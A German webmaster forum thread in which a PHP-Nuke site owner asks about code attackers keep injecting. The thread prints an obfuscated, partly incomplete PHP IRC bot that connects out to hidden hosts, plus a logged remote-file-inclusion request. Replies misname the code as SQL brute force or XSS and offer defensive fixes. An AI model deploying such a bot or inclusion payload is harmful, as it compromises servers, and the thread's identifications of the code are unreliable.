Ayom -> (XSS) Hackeraktivitäten auf meiner Seite

Ayom -> Forum -> Webmaster-Ecke -> Webmaster Allgemein

Anzeige - [Hier werben / Mediadaten]

(?) Tags raten (?) (edit)

(XSS) Hackeraktivitäten auf meiner Seite

Thema abonnieren | Thema versenden | Thema drucken

afg_hunter

Geschrieben am: Do 17.01.2008, 23:47

AyomRank 2

Gruppe: Member (inaktiv)
Beiträge: 9
Mitglied seit: 6.01.2008

Hallo,

Seit wochen versucht irgendein Kranker Mensch diesen Code auf meiner Seite einzubinden.
Kann mir jemand bitte sagen, was der Mensch mit dem Code erreichen möchte?
Ist es etwa son Art Hackangriff?

Danke

CODE

<? set_time_limit(0); ini_set("max_execution_time",0); set_magic_quotes_runtime(0); ini_set('output_buffering',0);
error_reporting(0); ignore_user_abort(); $aec12e0af93cb5 = array ( "po" => 8080, "sp" => "uJijk4iVsIXRmQ==",
"ch" => "aFaw", "ke" => "spd1iYSUqA==", "ha" => "dG1qQk1halK/nE6N", "pa" => "fpekVYhVdlWQXGLBXnBWWId1hll1WVWJVFpYh1tahVs=",
"tr" => "*", "mrnd" => 9, "mo" => "cqtrig==", "ve" => "dmFyWA==" ); function tc8a89c2c306fb($m341be97d9aff9) {
$m341be97d9aff9 = str_replace(" ", "", $m341be97d9aff9); return $m341be97d9aff9; } function ob5d21085bf2c0($m341be97d9aff9) {
$m341be97d9aff9 = base64_decode(tc8a89c2c306fb($m341be97d9aff9)); return $m341be97d9aff9; } function rfc35fdc70d5fc() {
global $aec12e0af93cb5; $see11cbb19052e = array(); $td707b8140a662 = ""; $b59b514174bffe = array("sqytlpaKo4a/lI6MnaWIiI+zUYSvkA==","sqywiZKPpZLTk4zDmG6aiYakkZRuhpCR","rpihlYyTr5LWVKHDi6SRl0+jko4=","rZytgpFPr5TDlI7MmW6FiQ==","sKJuhYdPopDTi5bHlKVRhoY=","tWeuVFZSclfDVI7CVKKPmYasjI+lUYOJ","vaOokJFUbpPOi5jClLNRhoY=","sqywiZKPpVeMipjHlm6RiZU=","sqytlpaKo5eMipjHlm6RiZU=");
shuffle($b59b514174bffe); if(($j351a1d2ad68bc = fsockopen(jf9feaa9bcab30($b59b514174bffe[0]),$aec12e0af93cb5['po'],$k70106d0d82151,$d809b1abe3f111,15))) {
$m8052146769b14 = ad988971435842($aec12e0af93cb5['mrnd']); if (strlen($aec12e0af93cb5['sp'])>0) { q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UEFTUw==")." ".jf9feaa9bcab30($aec12e0af93cb5['sp']));
} q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("VVNFUg==")." ".gfb0daa8f01135($aec12e0af93cb5['mrnd'])." 127.0.0.1 localhost :$m8052146769b14");
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14"); while (!feof($j351a1d2ad68bc)) {
$f7fabc1404929c = trim(fgets($j351a1d2ad68bc,512)); $h6e2baaf3b97db = explode(" ",$f7fabc1404929c);
if(($f7fabc1404929c == $td707b8140a662)) continue; if (isset($h6e2baaf3b97db[0]) && $h6e2baaf3b97db[0] == ob5d21085bf2c0("UElORw==")) {
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UE9ORw==")." ".$h6e2baaf3b97db[1]); } else if (isset($h6e2baaf3b97db[1]) && $h6e2baaf3b97db[1] == ob5d21085bf2c0("MDAx")) {
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TU9ERQ==")." $m8052146769b14 ".jf9feaa9bcab30($aec12e0af93cb5['mo']));
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("Sk9JTg==")." ".jf9feaa9bcab30($aec12e0af93cb5['ch'])." ".jf9feaa9bcab30($aec12e0af93cb5['ke']));
} else if(isset($zdfff0a7fa1a55[1]) && $zdfff0a7fa1a55[1] == ob5d21085bf2c0("NDMz")) { q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14");
} else if (isset($h6e2baaf3b97db[1]) && isset($see11cbb19052e[$h6e2baaf3b97db[1]])) { unset($see11cbb19052e[$h6e2baaf3b97db[1]]);
} else if (isset($h6e2baaf3b97db[1]) && ($h6e2baaf3b97db[1] == ob5d21085bf2c0("UFJJVk1TRw==") || $h6e2baaf3b97db[1] == "332")) {
$n78e731027d8fd = strstr($f7fabc1404929c," :"); $n78e731027d8fd = substr($n78e731027d8fd,2); $zdfff0a7fa1a55 = explode(" ",$n78e731027d8fd);
$m67b3dba8bc677 = $h6e2baaf3b97db[0]; $v7c6483ddcd99e = explode("!",$m67b3dba8bc677); $v7c6483ddcd99e = substr($v7c6483ddcd99e[0],1);
$d73be252ca8221 = FALSE; if ($zdfff0a7fa1a55[0] == "\1".ob5d21085bf2c0("VkVSU0lPTg==")."\1") { q56eacb300613d($j351a1d2ad68bc,"NOTICE ".$v7c6483ddcd99e." :\1".ob5d21085bf2c0("VkVSU0lPTg==")." ".jf9feaa9bcab30($aec12e0af93cb5['ve'])."\1");

} return $lb4a88417b3d01; } function gfb0daa8f01135($wfac65290966c7) { $t2cb9df9898e55 = ""; for ($i865c0c0b4ab0e=0;$i865c0c0b4ab0e<$wfac65290966c7; $i865c0c0b4ab0e++)
$t2cb9df9898e55 .= chr(mt_rand(0,25)+97); return $t2cb9df9898e55; } rfc35fdc70d5fc(); ?>

Toblerone	#2 Geschrieben am: Fr 18.01.2008, 00:09 (+00:22)
AyomRank 6 Gruppe: Member (aktiv) Beiträge: 936 Mitglied seit: 15.02.2007	Guck mal hier! Scheint so, als wäre es ein Script für eine SQL Brute Force Attacke Wie hast das rausgefunden, dass er das unterbringen will?

Duvi

#3 Geschrieben am: Fr 18.01.2008, 01:28 (+01:18)

AyomRank 5

Gruppe: Member (aktiv)
Beiträge: 499
Mitglied seit: 4.10.2006

ja es ist ein "hackerscript"
stichwort shell_exec

QUOTE

Kann mir jemand bitte sagen, was der Mensch mit dem Code erreichen möchte?

- informationen klauen
- spam über deine seite/server versenden
- deine seiten ändern, z.b. um links einzubauen
usw.
halt all das was du auch machen könntest, wenn du denn wolltest ...

so nebenbei, wäre vielleicht sinnvoll den code zumindest zu verändern oder zu kürzen. müssen hier ja keine hackerscripte veröffentlicht werden

oder braucht jemand eins?

afg_hunter

#4 Geschrieben am: Fr 18.01.2008, 08:09 (+06:41)

AyomRank 2

Gruppe: Member (inaktiv)
Beiträge: 9
Mitglied seit: 6.01.2008

Hi,
Ich bekomme am Tab bestimmt mehr als 100 mal solche Attacke ;-(.
wie kann ich mich langfrinstig vor solche Attacken schützen?

Ich benutze als Grundgerüst PHPNUKE aber alle moule die ich nutze wurden invidiuell entwickelt.
Eine Sicherheitsscript Namens "Admin Secure" schütze die seite und wehrt solche attacken ab.

CODE

- Browser: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
- Request: /modules.php?name=http://nsmsisoeueeitsdwfdfhfrdefaiss.land.ru/.html/head?
- Variable: $name = http://nsmsisoeueeitsdwfdfhfrdefaiss.land.ru/.html/head?

Julian Vieser	#5 Geschrieben am: Fr 18.01.2008, 08:20 (+00:10)
AyomRank 5 Gruppe: Member (aktiv) Beiträge: 349 Mitglied seit: 30.04.2004	Hacker ist in diesem Fall. "Nicht korrekt". Cracker ist das richtige Wort... Der grundlegende Unterschied ist: Hacker bauen Dinge auf, Cracker zerstören sie. Zu PHP-Nuke (ist nicht gerade das gelbe vom Ei) ich würde an Deiner Stelle früher oder später auf eine andere Software umsteigen.. Gruß Julian -------------------- Plattform rund um Test Driven Development

afg_hunter	#6 Geschrieben am: Fr 18.01.2008, 09:02 (+00:42)
AyomRank 2 Gruppe: Member (inaktiv) Beiträge: 9 Mitglied seit: 6.01.2008	Danke für die Antworten. Ich habe schon vor mich von PHPNUKE zu verabschieden. Dennoch muss ich mich bis dahin schützen. Wie kann ich nun besser die Seite absichern und solche Angriffe abwehren? Danke

sd12	#7 Geschrieben am: Fr 18.01.2008, 09:08 (+00:05)
AyomRank 9 Gruppe: Moderatoren Beiträge: 3581 Mitglied seit: 3.03.2004	Es gibt verschiedene Methoden. Entweder mit einer Appliance oder einem Script. Ich habe mal vor einiger Zeit einen Link zu einem guten Script veröffentlicht... -------------------- ************************ Treiber f[r das Kezboard ist [berfl[ssig.

afg_hunter	#8 Geschrieben am: Fr 18.01.2008, 09:12 (+00:03)
AyomRank 2 Gruppe: Member (inaktiv) Beiträge: 9 Mitglied seit: 6.01.2008	Wäre es möglich den Link noch mal zu veröffentlichen? Danke

Julian Vieser	#9 Geschrieben am: Fr 18.01.2008, 09:20 (+00:08)
AyomRank 5 Gruppe: Member (aktiv) Beiträge: 349 Mitglied seit: 30.04.2004	Also wenn Du nen bisschen Ahnung von PHP hast kannst Du selbst an PHP-Nuke Hand anlegen. Nützlich wäre hier z.B. die Funktionen html_entity_decode oder bzw. und htmlentities bei den Ein- und Ausgaben. PHP-Nuke ist schlampig programmiert (sry aber ich denke diese Ausdrucksweise is berechtigt) Eingaben werden nur teilweise gecheckt. Zumindestens war das noch vor ca. 1 1/2 Jahren so.. ob sich was gebessert hat weiss ich atm nich. Mit Sentinel wird PHP Nuke um einiges sicherer. Aber alleine das man ein solches "Sicherheitsmodul" einsetzen muss ist schon traurig und wirft meiner Meinung nach kein gutes Licht auf Software PHP-Nuke. Gruß -------------------- Plattform rund um Test Driven Development

profo	#10 Geschrieben am: Fr 18.01.2008, 09:24 (+00:03)
AyomRank 5 Gruppe: Member (aktiv) Beiträge: 252 Mitglied seit: 19.01.2007	Du bist ja eigentlich ein bisschen im Vorteil, weil Du den Schrott schon kennst. Dann könntest Du als kleine Abwehrversuche evtl. schon mit mod_rewrite etwas tun. So Pi mal Daumen: RewriteCond %{QUERY_STRING} =http RewriteRule .* - [F,L] Viele Grüße Martin -------------------- Forenverzeichnis, Blogverzeichnis und Wikiverzeichnis ohne Backlinkfplicht E-Mail mit mailde.de - Einfach E-Mail! beziehungs-kiste.net - Das Tratschforum für Singles, Paare und Familien

PH	#11 Geschrieben am: Fr 18.01.2008, 11:56 (+02:32)
AyomRank 7 Gruppe: Member (aktiv) Beiträge: 1259 Mitglied seit: 29.08.2004	Wenn Du einen Apache Server hast, verwende Mod_Security Anstelle von PHP-Nuke würde ich Dir für ähnliche Funktionen und bessere Sicherheit entweder Postnuke oder Drupal empfehlen.

sd12

#12 Geschrieben am: Fr 18.01.2008, 13:21 (+01:25)

AyomRank 9
Group Icon

Gruppe: Moderatoren
Beiträge: 3581
Mitglied seit: 3.03.2004

QUOTE (afg_hunter @ Fr 18.01.2008, 10:12)

Wäre es möglich den Link noch mal zu veröffentlichen?
Danke

Das war ein Hint an Dich, dass Du siuchen sollst!

Google: site:ayom.com sd12 XSS 1. Resultat. Aber hier ist der Link:
http://php-ids.org/

--------------------

************************
Treiber f[r das Kezboard ist [berfl[ssig.

afg_hunter	#13 Geschrieben am: Fr 18.01.2008, 19:12 (+05:50)
AyomRank 2 Gruppe: Member (inaktiv) Beiträge: 9 Mitglied seit: 6.01.2008	Besten Dank für die Hilfe. Möchte jemand mir dieses Script auf meiner Seite implementieren und configurieren? Bitte schreibt was ihr dafür haben möchtet? Danke

sd12

#14 Geschrieben am: Fr 18.01.2008, 19:30 (+00:18)

AyomRank 9
Group Icon

Gruppe: Moderatoren
Beiträge: 3581
Mitglied seit: 3.03.2004

QUOTE (afg_hunter @ Fr 18.01.2008, 20:12)

Besten Dank für die Hilfe.

Möchte jemand mir dieses Script auf meiner Seite implementieren und configurieren?

Bitte schreibt was ihr dafür haben möchtet?

Danke

Hoster?

--------------------

************************
Treiber f[r das Kezboard ist [berfl[ssig.

afg_hunter	#15 Geschrieben am: Fr 18.01.2008, 19:48 (+00:18)
AyomRank 2 Gruppe: Member (inaktiv) Beiträge: 9 Mitglied seit: 6.01.2008	Ich weiss nicht, was hier mit "Hoster" gemeint ist. Ich bin nich tso sehr gewandert in der IT-Sprache ;-) Falls Webhoster gemeint ist. Die Domain ist bei 1und1 gehostet. Ich kann nur die Domain privat bekannt geben. Es soll nicht alle wissen, dass die Seite "gefährdet" ist :-) Sonst habe ich noch mehr möchtegern hacker..etc am Hals.

afg_hunter	#16 Geschrieben am: Sa 19.01.2008, 00:26 (+04:37)
AyomRank 2 Gruppe: Member (inaktiv) Beiträge: 9 Mitglied seit: 6.01.2008	Danke, Hab dir n Pm verschickt.

Thema wird von 0 Benutzer(n) gelesen (0 Gäste und 0 anonyme Benutzer)

0 Mitglieder:

« Suche Google Map Portal/CMS mit Marker Manager | Webmaster Allgemein | Grundlegendes zu XSS »

Trackback-Url: http://www.ayom.com/track/t/22558

Dieses Thema abonnieren

Artikel die Sie interessieren könnten: (beta) - Feedback

Wie optimiere ich meine Seite für Suchmaschinen?
Mehrere Google Adsense Anzeigen auf einer Seite?
Was bringt ein Forum meiner Website?
Woher weiss Google ob meine Seite aus dem Land xy ist?
Von welcher Seite kommt der User?

Ähnliche Themen

Themen Titel	Autor	Views	Antworten	Letzte Aktion
Browser + Port 80 = Seite nicht gefunden	Maik	25	1	Sa 22.11.2008, 04:18
[B] Werbelinks auf freesms-Seite	flown	63	0	So 16.11.2008, 00:36
Wie optimiere ich die Seite allgemein?	Cheers	309	7	Di 11.11.2008, 20:28
Wikipedia in der eigenen Seite integrieren?	BartTheDevil89	345	10	Di 4.11.2008, 19:43
[B]Internationale Diablo 3 Seite [PR3, 10.00	Diablo3	90	0	Di 28.10.2008, 01:10
Fehler auf meiner Seite im IE?	Christian	87	3	Fr 24.10.2008, 10:23
Teile einer Seite extern einbinden	Dachs	180	4	Fr 17.10.2008, 23:16
Impressumspflicht internationale Seite	Sandwolf	264	6	Di 14.10.2008, 14:18
CMS für News-Seite	kare	267	16	Mo 13.10.2008, 15:17
Wie bekomme ich mehr Backlinks auf meine Seite?	Soccout	1534	15	Sa 11.10.2008, 23:41

Anzeige - [Hier werben / Mediadaten]

Startseite

Ayom Blog

Forum

Wissensdatenbank

Domainbörse

Supertext

Über Ayom

Partner

Anzeigen